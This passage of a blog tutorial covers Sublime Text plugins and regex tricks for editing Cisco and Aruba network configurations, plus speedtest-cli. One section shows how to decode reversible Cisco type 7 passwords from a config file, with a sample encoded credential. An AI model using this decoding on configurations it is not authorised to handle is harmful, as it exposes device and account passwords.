center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sWBiB1xnbBp9NwIQlShM_NJmFq9BMOd1NMtUwyngs5H4kxdSmUIjJOHaU1QLCpJKJXbC9P1MbIOnOGtAjLQO8bBbRFIiyn6sXds-5nd3iLhHVM9-jehczwKBaDs-iys4B6c2GJU5mj3Y/s628/Screen+Shot+2021-04-22+at+21.24.36.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="386" data-original-width="628" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2sWBiB1xnbBp9NwIQlShM_NJmFq9BMOd1NMtUwyngs5H4kxdSmUIjJOHaU1QLCpJKJXbC9P1MbIOnOGtAjLQO8bBbRFIiyn6sXds-5nd3iLhHVM9-jehczwKBaDs-iys4B6c2GJU5mj3Y/s320/Screen+Shot+2021-04-22+at+21.24.36.png" width="320" /></a></div><br /><p><b>File extensions</b></p><p>If a configuration file has a specific file extension and is opened in Sublime Text, the syntax will be automatically be set:</p><p></p><ul style="text-align: left;"><li>Cisco ASA - *.cisco-asa - *.asa</li><li>Cisco ACE - *.cisco-ace</li><li>Cisco IOS - *.cisco-ios - *.ios</li><li>Cisco IOS XR - *.cisco-ios-xr - *.ios-xr</li><li>Cisco NXOS - *.cisco-nxos - *.cisco-nexus - *.nxos</li></ul><p></p><p>Here is a screenshot of a highlighted configuration</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnqO_Xg5bQNDmBBP-qba1L7VF71dL65Lm9nymmo0Q0ERe1PSLfSQQ7mpxErUeklih-v8PcU77xGn99VHBlJdT4O4CqyXCbR0XUmj_BdJSwBF_dZYanfGxMJw1GKmNbsltCWVP8ngcz36rI/s794/Screen+Shot+2021-04-22+at+21.30.39.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="794" data-original-width="736" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnqO_Xg5bQNDmBBP-qba1L7VF71dL65Lm9nymmo0Q0ERe1PSLfSQQ7mpxErUeklih-v8PcU77xGn99VHBlJdT4O4CqyXCbR0XUmj_BdJSwBF_dZYanfGxMJw1GKmNbsltCWVP8ngcz36rI/s320/Screen+Shot+2021-04-22+at+21.30.39.png" /></a></div><br /><p><b>Completions</b></p><p>Configuration snippets and autocompletion are suggested based on the syntax and configuration mode.</p><p>For example, I started typing errd and it suggested the following:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidnc2XaGgCcPDxdtaU1xAHT4M0ns7Nu-1x6eCDKHSMVm_9l8KZYeM3JRC6befq16tQIeTt7UmwUrP-Eko_PSfEQVqHtfWzhDKNVt4fiEGUzAjo36DU89043z7Oqve0kPe-IJLszjX49jnX/s640/Screen+Shot+2021-04-22+at+21.33.19.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="318" data-original-width="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidnc2XaGgCcPDxdtaU1xAHT4M0ns7Nu-1x6eCDKHSMVm_9l8KZYeM3JRC6befq16tQIeTt7UmwUrP-Eko_PSfEQVqHtfWzhDKNVt4fiEGUzAjo36DU89043z7Oqve0kPe-IJLszjX49jnX/s320/Screen+Shot+2021-04-22+at+21.33.19.png" width="320" /></a></div><br /><p><b>Mask Conversions</b></p><p>type a / and the conversion window will pop up. Once you find the mask you want press [enter]</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-bmQ2B4WTYAlX6KVgmBBOr5go9AJp-pyLtY9cmsJFy1xSBYTyEQUbOMUjwZEYbq-4XhhCmu-vcwFhCVft89YpZqgbkwXb3qyu2YJpndXw5l6GF50uFcsCjJsgyRS0gftQ0Eq2gFycGcSa/s616/Screen+Shot+2021-04-22+at+21.36.48.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="356" data-original-width="616" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-bmQ2B4WTYAlX6KVgmBBOr5go9AJp-pyLtY9cmsJFy1xSBYTyEQUbOMUjwZEYbq-4XhhCmu-vcwFhCVft89YpZqgbkwXb3qyu2YJpndXw5l6GF50uFcsCjJsgyRS0gftQ0Eq2gFycGcSa/s320/Screen+Shot+2021-04-22+at+21.36.48.png" width="320" /></a></div><br /><p>In this example, pressing [enter] will insert 255.255.255.0</p><p>You can press ctrl+space to toggle between the netmask, wildcard mask and /</p><h4 style="text-align: left;">Jumping</h4><p>One of the greatest features, if you are working on a large configuration file, is the ability to jump to commands that enter a configuration mode. For example, to jump to "interface vlan 20" press "cmd+r" and a dialog box will appear:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6BfvVM_DYaxfObZjzvC9GBimrwmZhg_6RxtmYyHNvXzZE3qQIH-qjAtnKpipzRaXj_A1Pvbb8mS4I3VNo8VA-5qR2mOD7gsjl85VqMJy-Aup9uFhPhFBlvl1j7Y-P4IpNwwjDI7xQyMyQ/s1770/Screen+Shot+2021-09-04+at+22.53.21.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="590" data-original-width="1770" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6BfvVM_DYaxfObZjzvC9GBimrwmZhg_6RxtmYyHNvXzZE3qQIH-qjAtnKpipzRaXj_A1Pvbb8mS4I3VNo8VA-5qR2mOD7gsjl85VqMJy-Aup9uFhPhFBlvl1j7Y-P4IpNwwjDI7xQyMyQ/w479-h160/Screen+Shot+2021-09-04+at+22.53.21.png" width="479" /></a></div><div><br /></div>Type "vlan 20". <div><br /></div><div>In the search box select "interface Vlan20" and it will jump to that line. In this case, it's on line 685. <br /><p>You can search for more than just interfaces. Here I entered ip to find an access-list.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFbNGoxhonRTMWq9bvSs1dp8IDqo-_KTamDL1y3O3_aKzXfnqVjwcCOtiIuoxcHP_G4_io6THatStS9y547Yx3oSWPBm3364xjZSpCF4efQAnc8j77bauGl6MwB2qPNrbEO0BOG6bbCQ5/s1794/Screen+Shot+2021-09-04+at+22.57.52.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="520" data-original-width="1794" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNFbNGoxhonRTMWq9bvSs1dp8IDqo-_KTamDL1y3O3_aKzXfnqVjwcCOtiIuoxcHP_G4_io6THatStS9y547Yx3oSWPBm3364xjZSpCF4efQAnc8j77bauGl6MwB2qPNrbEO0BOG6bbCQ5/w484-h141/Screen+Shot+2021-09-04+at+22.57.52.png" width="484" /></a></div><br /><p>You can also jump to "line con" or "line vty"</p><p><br /></p><h4 style="text-align: left;">Type 7 password decoding</h4><p>Cisco type 7 passwords aren't hashed, they are "encoded' so they are reversible. Network Tech has a handy feature to decode them.</p><p>In a file that has a type 7 password:</p><p></p><ul style="text-align: left;"><li>Press Shift (⇧) + Command (⌘) + p to open the command palette</li><li>Enter "<span face="Lato, proxima-nova, "Helvetica Neue", Arial, sans-serif" style="background-color: #fcfcfc; caret-color: rgb(64, 64, 64); color: #404040; font-size: 16px;">Network Tech: Decode Passwords"</span></li></ul><p></p><p><span face="Lato, proxima-nova, "Helvetica Neue", Arial, sans-serif" style="background-color: #fcfcfc; caret-color: rgb(64, 64, 64); color: #404040; font-size: 16px;">You will see the passwords from the file, select the one you want to decode</span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhakoKTxM1VIUKjx5k_tUxuWcGSn7z2IxeuYnQ0G13UoQ_i3itsD_tJysGUnuskuizci2mllZnA_CgMwHzvZAahS0eu6ED0k6ZnFC5roGXYUiqC2RvtGfmdxqTyW1NBJC52VG5M_wqpfXyQ/s750/Screen+Shot+2021-04-30+at+22.05.20.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="210" data-original-width="750" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhakoKTxM1VIUKjx5k_tUxuWcGSn7z2IxeuYnQ0G13UoQ_i3itsD_tJysGUnuskuizci2mllZnA_CgMwHzvZAahS0eu6ED0k6ZnFC5roGXYUiqC2RvtGfmdxqTyW1NBJC52VG5M_wqpfXyQ/w450-h127/Screen+Shot+2021-04-30+at+22.05.20.png" width="450" /></a></div><br /><span face="Lato, proxima-nova, "Helvetica Neue", Arial, sans-serif" style="background-color: #fcfcfc; caret-color: rgb(64, 64, 64); color: #404040; font-size: 16px;"><br /></span><p></p><p><span face="Lato, proxima-nova, "Helvetica Neue", Arial, sans-serif" style="background-color: #fcfcfc; caret-color: rgb(64, 64, 64); color: #404040; font-size: 16px;">In this example:</span></p><p><span style="background-color: #fcfcfc; caret-color: rgb(64, 64, 64);"><span style="color: #404040; font-family: courier;">username cisco privilege 15 password 7 13061E01080355</span></span></p><p><span style="background-color: #fcfcfc; caret-color: rgb(64, 64, 64);"><span face="Lato, proxima-nova, Helvetica Neue, Arial, sans-serif" style="color: #404040;">It will ask if you want to save the password to the clipboard or display it. Here is what it looks like if you choose to display:</span></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd1nQtEmZJHr9EE14JaGS4dYIEg8f25_3_TTVGS41Q_hk1XwO2l2Zlla0rrzEcD4Ny1y-gzB99-NKBAriYNmYql-fhlmJiAO7_zDiehdNYHEOicLMaoJJIkCNTWP-n_48tbwEtjQbNTpVT/s746/Screen+Shot+2021-04-30+at+22.00.04.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="562" data-original-width="746" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd1nQtEmZJHr9EE14JaGS4dYIEg8f25_3_TTVGS41Q_hk1XwO2l2Zlla0rrzEcD4Ny1y-gzB99-NKBAriYNmYql-fhlmJiAO7_zDiehdNYHEOicLMaoJJIkCNTWP-n_48tbwEtjQbNTpVT/w399-h300/Screen+Shot+2021-04-30+at+22.00.04.png" width="399" /></a></div><br /><h4 style="text-align: left;">Listing network details</h4><p>If you highlight an IP address and subnet mask, network tech list all the details for the subnet:</p><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-E4Jckg2b-0Woc9mVLCD0UsR3UsktngmOJ0y20CFD2yKIEPG1S6G7ANsvvb5Zp6M6at1Wh6FDTlihdV1v_-NvFyTuSaPWhxv7s5uQKRnQqcu3Dumnj9soxQQDvf10w4ztdyzTzzzKVWE/s750/Screen+Shot+2021-04-30+at+22.13.58.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="498" data-original-width="750" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEip-E4Jckg2b-0Woc9mVLCD0UsR3UsktngmOJ0y20CFD2yKIEPG1S6G7ANsvvb5Zp6M6at1Wh6FDTlihdV1v_-NvFyTuSaPWhxv7s5uQKRnQqcu3Dumnj9soxQQDvf10w4ztdyzTzzzKVWE/w432-h286/Screen+Shot+2021-04-30+at+22.13.58.png" width="432" /></a></div><br /><h4 style="text-align: left;">Reference</h4><p><a href="https://network-tech.readthedocs.io/en/stable/install.html">Network Tech</a><br /></p><h4 style="text-align: left;"><br /></h4><h4 style="text-align: left;">Compare Side-By-Side plugin</h4><div><br /></div><div><div>This package adds a simple side-by-side comparison tool to Sublime Text. I like MELD for comparing files but this control is very convenient since it's integrated into Sublime and works well.</div><div><br /></div><div><b>Features</b></div><div><ul style="text-align: left;"><li>Easily select two tabs or selections to compare</li><li>Comparison results open in a new window</li><li>Empty lines added so common code lines up</li><li>Count number of lines changed</li><li>Highlighting of changed lines</li><li>Intra-line diff highlighting</li><li>Synchronized scrolling</li></ul></div><div><br /></div><div><b>Installation Options</b></div><div><ul style="text-align: left;"><li>Search for and install using Package Control (⌘+↑+P, “Install Package”)</li><li>(Preferences -> Browse Packages)</li></ul></div><div><br /></div><div><b>Usage Options</b></div><div>Right-click on a tab and select “Compare with…”</div><div>Right-click somewhere in the active view and select “Compare with…”</div><div>Right-click on a tab and select “Compare with active tab”</div><div>Highlight text, right-click -> “Mark selection for comparison”</div><div>Mark a second selection, then right-click -> “Compare selections”</div><div>Create two selections by holding CTRL, then “Compare selections”</div><div>From the command line: see README_COMMANDS.md</div><div>Jump to next: Alt+N, Jump to previous: Alt+P</div></div>
<h4 style="text-align: left;"><br /></h4><h4 style="text-align: left;">Reference</h4><h4 style="text-align: left;"><a href="https://packagecontrol.io/packages/Compare%20Side-By-Side">Compare Side-By-Side</a></h4><h3 id="usingregex" style="text-align: left;"><br /></h3><h3 id="usingregex" style="text-align: left;">Using Regular Expressions</h3><div>Sublime text supports regular expressions or Regex. This is a very powerful feature for searching and replacing text. I'm not going to lie to you, they are confusing but some simple concepts can get you a long way. </div><div><br /></div><h4 style="text-align: left;">Replacing vlan20 with vlan 20</h4><div>I have been replacing a lot of Cisco equipment with Aruba. Usually, I don't try to copy Cisco configs over and modify, I would create a new Aruba template with the correct syntax and build a new configuration. </div><div><br /></div><div>Today I needed to add several SVIs from a Cisco to an Aruba. A template didn't make sense because it was just one switch, but I needed to update about 30 interface statements. Regex to the rescue! </div><div><br /></div><div>Here is what we will enter into the search/replace dialog:</div><div><br /></div><div><div>find: interface ([vV]lan)(\d{1,3})</div><div>Replace: $1 $2</div></div><p>The () create a "capture group" that allows you to use the text it found in the replace window. The capture groups start at 1 and increment by 1. </p><p>In this example, the first capture group matches on v or V.</p><p>The second matches on digits "\d" and the {1,3} matches 1, 2 or 3 digits.</p><p>In the replace dialog, click the icon on the far left that looks like a '.*". This puts the search box in regex mode.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju9ZXk2OypdOm-tgIqN84-fqNujlaJQKH_qszozlF-VHaRt3VffeRCqrH3yiSBR7XtUF0HmH9C-R8gP_v0WBboRveZqLjWOzBXRH7VCc9vrQXF5r4QfH0vbSVkA2eKS3mhudq17Bc1iGH8/s1252/Screen+Shot+2021-09-16+at+22.26.12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="228" data-original-width="1252" height="89" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEju9ZXk2OypdOm-tgIqN84-fqNujlaJQKH_qszozlF-VHaRt3VffeRCqrH3yiSBR7XtUF0HmH9C-R8gP_v0WBboRveZqLjWOzBXRH7VCc9vrQXF5r4QfH0vbSVkA2eKS3mhudq17Bc1iGH8/w489-h89/Screen+Shot+2021-09-16+at+22.26.12.png" width="489" /></a></div><br /><h4 style="text-align: left;">Replacing text from the beginning of a line</h4><p>Given a file with strings like this:</p>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: #ff6600;">01</span>_BRAD<span style="color: #555555;">-</span>MDF<span style="color: #555555;">-</span>AdminTL<span style="color: #555555;">-</span>STK1<span style="color: #555555;">-</span><span style="color: #ff6600;">2</span><span style="color: #555555;">-</span>config<span style="color: #555555;">-</span>output<span style="color: #555555;">.</span>txt:Gi2<span style="color: #555555;">/</span><span style="color: #ff6600;">0</span><span style="color: #555555;">/</span><span style="color: #ff6600;">10</span> up up <span style="color: #555555;"><</span> Surv Serv <span style="color: #ff6600;">10.196</span><span style="color: #555555;">.</span><span style="color: #ff6600;">250.2</span> <span style="color: #ff6600;">1</span>c98<span style="color: #555555;">.</span>ec15<span style="color: #555555;">.</span>a338 <span style="color: #555555;">></span>
</pre></div>
<p><br /></p><p>I just wanted the text starting with < and ending with ></p><div>This regex did the trick</div><div><br /></div><div>^.*<</div><div><br /></div><div>The "^" character means start at the beginning of the line</div><div>The "." means match one character</div><div>The "*" 0 or more of the preceding expression</div><div>The "<" was the first character that I wanted to keep.</div><div><br /></div><div>The replace statement was just "<".</div><div><br /></div><div>Here is what it looked like in sublime text:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU3SrLS5fl9OTp-I-xUxT1GagpqmynHsFgfvhYnE4I7Re9KBFSkSbvZjL0kXCKahaA3-DjiSoZLIkbadp6-E5av6aHGjX9OthyphenhyphenvcRHx2Mvtrj6VCu6_AVMwYpOgEz1_0rTHVv2hhm31ANc/s2218/Screen+Shot+2021-09-16+at+22.48.00.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="144" data-original-width="2218" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhU3SrLS5fl9OTp-I-xUxT1GagpqmynHsFgfvhYnE4I7Re9KBFSkSbvZjL0kXCKahaA3-DjiSoZLIkbadp6-E5av6aHGjX9OthyphenhyphenvcRHx2Mvtrj6VCu6_AVMwYpOgEz1_0rTHVv2hhm31ANc/w631-h21/Screen+Shot+2021-09-16+at+22.48.00.png" width="631" /></a></div><div><br /></div>Click the image to enlarge<br /><div class="separator" style="clear: both; text-align: center;"><br /></div><br /><div>I had 156 lines like this and with regex it took about 30 seconds to get the text I needed.</div><div><br /></div><div><br /></div>
<h4 id="regexq" style="text-align: left;">Regex quantifiers</h4><div>Change Gi1/1 to Gi1/0/1 and repeat all other interfaces in the file</div><div><br /></div><div><div>Find: (Gi[0-9])/([0-9]+)</div><div>Replace: $1/0/$2</div></div><div><br /></div><div>Note:</div><div>You could also use (Gi[0-9])/([0-9]{1,2}) since the interfaces range from 1-48, 2 digits.</div><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; text-align: left; width: auto;"><pre style="line-height: 125%; margin: 0px;">Quantifier Meaning
A<span style="background-color: #ffaaaa; color: #aa0000;">?</span> Match regular expression A zero <span style="color: black; font-weight: bold;">or</span> one times
A<span style="color: #555555;">*</span> Match regular expression A zero <span style="color: black; font-weight: bold;">or</span> more times
A<span style="color: #555555;">+</span> Match regular expression A one <span style="color: black; font-weight: bold;">or</span> more times
A{m} Match regular expression A exactly m times
A{m,n} Match regular expression A between m <span style="color: black; font-weight: bold;">and</span> n times (included)
</pre></div>
<div style="text-align: left;"><br /></div><div style="text-align: left;">The quantifiers are a powerful feature of regex. Here are some examples using interfaces.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">The ? quantifier</div><div style="text-align: left;">Not that it matched just the first digit after the /</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw1pt_I1_hxoOzPPFKZlZ9an9BqDRGZI8CGO2ipNQqJhDg99zq7X6afAYLCsIV2K567HZgTriggXZzorMKBMnpF9HNVyN-Wsep8hFWbpSFoG19WBeUcy85REEZMrMiMrajspvIbpWqj2aX/s958/Screen+Shot+2021-09-18+at+18.31.01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="202" data-original-width="958" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw1pt_I1_hxoOzPPFKZlZ9an9BqDRGZI8CGO2ipNQqJhDg99zq7X6afAYLCsIV2K567HZgTriggXZzorMKBMnpF9HNVyN-Wsep8hFWbpSFoG19WBeUcy85REEZMrMiMrajspvIbpWqj2aX/w456-h67/Screen+Shot+2021-09-18+at+18.31.01.png" width="456" /></a></div><br /><div style="text-align: left;">The * quantifier</div><div style="text-align: left;">Obviously there isn't a switch with 100,000,000 ports, I made that up to show that the "*" matches 0 or more times.</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwl3jL_Ms27As6SEM6LU9WXEkYAczOB7k5HwAvyKbOjRfUoYIVLR0ac-OGLGh4RZqqBHDr8jJSTs-IXVKYLPQhd-LPX5fRVPbMTll-2OgFr4fDIYiDp7hodcu2vk1vdTdBo7F3NJvfUKVq/s928/Screen+Shot+2021-09-18+at+18.35.37.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="928" height="62" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwl3jL_Ms27As6SEM6LU9WXEkYAczOB7k5HwAvyKbOjRfUoYIVLR0ac-OGLGh4RZqqBHDr8jJSTs-IXVKYLPQhd-LPX5fRVPbMTll-2OgFr4fDIYiDp7hodcu2vk1vdTdBo7F3NJvfUKVq/w463-h62/Screen+Shot+2021-09-18+at+18.35.37.png" width="463" /></a></div><div><br /></div>and here zero instances! Don't forget about 0 times, it can catch you by surprise.</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF97sOugujaX8P5YCmSLCf0BaPhZLBynNIf3eRvE7URVGOZtYH3-k7ZXW1qns_ILeG4ASjX2X3I4NTkEkWjYvVW58XtoOUWWv3aNhdk5D51ZMVyt9b3v5Lhm_wN4vD57D40DS956QFkx1t/s926/Screen+Shot+2021-09-18+at+18.38.56.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="192" data-original-width="926" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF97sOugujaX8P5YCmSLCf0BaPhZLBynNIf3eRvE7URVGOZtYH3-k7ZXW1qns_ILeG4ASjX2X3I4NTkEkWjYvVW58XtoOUWWv3aNhdk5D51ZMVyt9b3v5Lhm_wN4vD57D40DS956QFkx1t/w463-h66/Screen+Shot+2021-09-18+at+18.38.56.png" width="463" /></a></div><div><br /><div style="text-align: left;"><br /></div><div style="text-align: left;">The + quantifier</div><div style="text-align: left;">Here is an example of the "or more times"</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqi5pO5Uh-HozMF_n31lyBPGpCq1rOYwlB0hOrQLvIq7bFeMMO55nHD5tYoN1HcuFy75hibeCrOq0owLrk1wrVSXbKEMyLTlsjmdD17qKuVRJPVXlMqfiptBZOqB31KIdR0-9kWr_AB35x/s914/Screen+Shot+2021-09-18+at+18.42.02.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="226" data-original-width="914" height="79" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqi5pO5Uh-HozMF_n31lyBPGpCq1rOYwlB0hOrQLvIq7bFeMMO55nHD5tYoN1HcuFy75hibeCrOq0owLrk1wrVSXbKEMyLTlsjmdD17qKuVRJPVXlMqfiptBZOqB31KIdR0-9kWr_AB35x/w476-h79/Screen+Shot+2021-09-18+at+18.42.02.png" width="476" /></a></div><br /><div style="text-align: left;">Notice that unlike the "*" it doesn't match on 0 times</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_3eqx4b8904912pHGF2wm9UL3vZ34zZ_zp8N4r9wbd0i-VCXkbpvQ2HBdx-ScsfDnw4g_c1vinFS6crbPMV3FDIUnAusTKkN1fcdYcmP4FjiAxHoEs1OCrK8V7am6soErIMZTNrmquy3m/s926/Screen+Shot+2021-09-18+at+18.43.36.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="166" data-original-width="926" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_3eqx4b8904912pHGF2wm9UL3vZ34zZ_zp8N4r9wbd0i-VCXkbpvQ2HBdx-ScsfDnw4g_c1vinFS6crbPMV3FDIUnAusTKkN1fcdYcmP4FjiAxHoEs1OCrK8V7am6soErIMZTNrmquy3m/w494-h57/Screen+Shot+2021-09-18+at+18.43.36.png" width="494" /></a></div><br /><div style="text-align: left;">The {} quantifier</div><div style="text-align: left;">This quantifier allows you to pick exactly how many matches you want. Perfect for an interface.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Here is an example for matching the regex exactly 2 times</div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvDAZduufUrr-oTHccwUmzY6dqq_0buZD94bbIWBLIshkD30nmIdFoY27xB019-fXVSdlLR0AShAVVnJlybBzJy6ZglYCEO3iNdAjNOOZ5EgGc67MZtuf9NDgK5Ea_V-0Gui92BCH7Mjx/s960/Screen+Shot+2021-09-18+at+18.50.06.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="218" data-original-width="960" height="73" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvDAZduufUrr-oTHccwUmzY6dqq_0buZD94bbIWBLIshkD30nmIdFoY27xB019-fXVSdlLR0AShAVVnJlybBzJy6ZglYCEO3iNdAjNOOZ5EgGc67MZtuf9NDgK5Ea_V-0Gui92BCH7Mjx/w509-h73/Screen+Shot+2021-09-18+at+18.50.06.png" width="509" /></a></div><br /><div style="text-align: left;"><br /></div><div style="text-align: left;">Here is an example for matching the regex 1 or 2 times. </div><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGNYzIqQxvXAvtM60TyAA5A6m6qb51zcHAVfQ_CW8RHg8eUAAjoL_oqvCqz5z9YclrHjj7I-REP6lE_E0ccBHqsKkZKxJaP7ViHB9mEezUDQt9goBpjNMiINtcwEoFcUaBIi8WbMjzuqeh/s998/Screen+Shot+2021-09-18+at+18.46.15.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="188" data-original-width="998" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGNYzIqQxvXAvtM60TyAA5A6m6qb51zcHAVfQ_CW8RHg8eUAAjoL_oqvCqz5z9YclrHjj7I-REP6lE_E0ccBHqsKkZKxJaP7ViHB9mEezUDQt9goBpjNMiINtcwEoFcUaBIi8WbMjzuqeh/w511-h60/Screen+Shot+2021-09-18+at+18.46.15.png" width="511" /></a></div><br /><div style="text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi68Mr5uDuodFjGM7Wm92XpC5hle-7rql5IVwPoHQoGK_49YIYt4Tn-MKHGq6dosF6CEtD7YNCEL6uLo1We0esqOyNrhXxrumuzzwTLOjuRzRiOUgKEHq56bAJ2m7i4mSq8JENvPLCk8WAG/s1006/Screen+Shot+2021-09-18+at+19.07.22.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="186" data-original-width="1006" height="59" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi68Mr5uDuodFjGM7Wm92XpC5hle-7rql5IVwPoHQoGK_49YIYt4Tn-MKHGq6dosF6CEtD7YNCEL6uLo1We0esqOyNrhXxrumuzzwTLOjuRzRiOUgKEHq56bAJ2m7i4mSq8JENvPLCk8WAG/w518-h59/Screen+Shot+2021-09-18+at+19.07.22.png" width="518" /></a></div><div style="text-align: left;"><br /></div><h4 style="text-align: left;">Reference</h4><div style="text-align: left;"><a href="http://www.regular-expressions.info/anchors.html">Regex Anchors</a><br /></div><div style="text-align: left;"><a href="https://stackoverflow.com/questions/2912894/how-to-match-any-character-in-regular-expression">how-to-match-any-character-in-regular-expression</a></div><div style="text-align: left;"><a href="https://blog.finxter.com/python-regex-greedy-vs-non-greedy-quantifiers/">Greedy vs Non Greedy Quantifiers</a><br /></div><div style="text-align: left;"><br /></div><h3 id="speedtest" style="text-align: left;">Speedtest-cli</h3><p>https://github.com/sivel/speedtest-cli</p><p><b>Installation</b></p><p><b>Pip install speedtest-cli</b></p><div><br /></div>
<!--HTML generated using hilite.me--><div style="background: rgb(240, 243, 243); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;">speedtest<span style="color: #555555;">-</span>cli
Retrieving speedtest<span style="color: #555555;">.</span>net configuration<span style="color: #555555;">...</span>
Testing <span style="color: #006699; font-weight: bold;">from</span> <span style="color: #00ccff; font-weight: bold;">Spectrum</span> (<span style="color: #ff6600;">71.84</span><span style="color: #555555;">.</span><span style="color: #ff6600;">93.96</span>)<span style="color: #555555;">...</span>
Retrieving speedtest<span style="color: #555555;">.</span>net server <span style="color: #336666;">list</span><span style="color: #555555;">...</span>
Selecting best server based on ping<span style="color: #555555;">...</span>
Hosted by Cox <span style="color: #555555;">-</span> Orange County (Orange County, CA) [<span style="color: #ff6600;">51.76</span> km]: <span style="color: #ff6600;">27.113</span> ms
Testing download speed<span style="color: #555555;">................................................................................</span>
Download: <span style="color: #ff6600;">102.39</span> Mbit<span style="color: #555555;">/</span>s
Testing upload speed<span style="color: #555555;">......................................................................................................</span>
Upload: <span style="color: #ff6600;">21.24</span> Mbit<span style="color: #555555;">/</span>s
</pre></div>
<p></p>
<p> </p>
<p> </p>
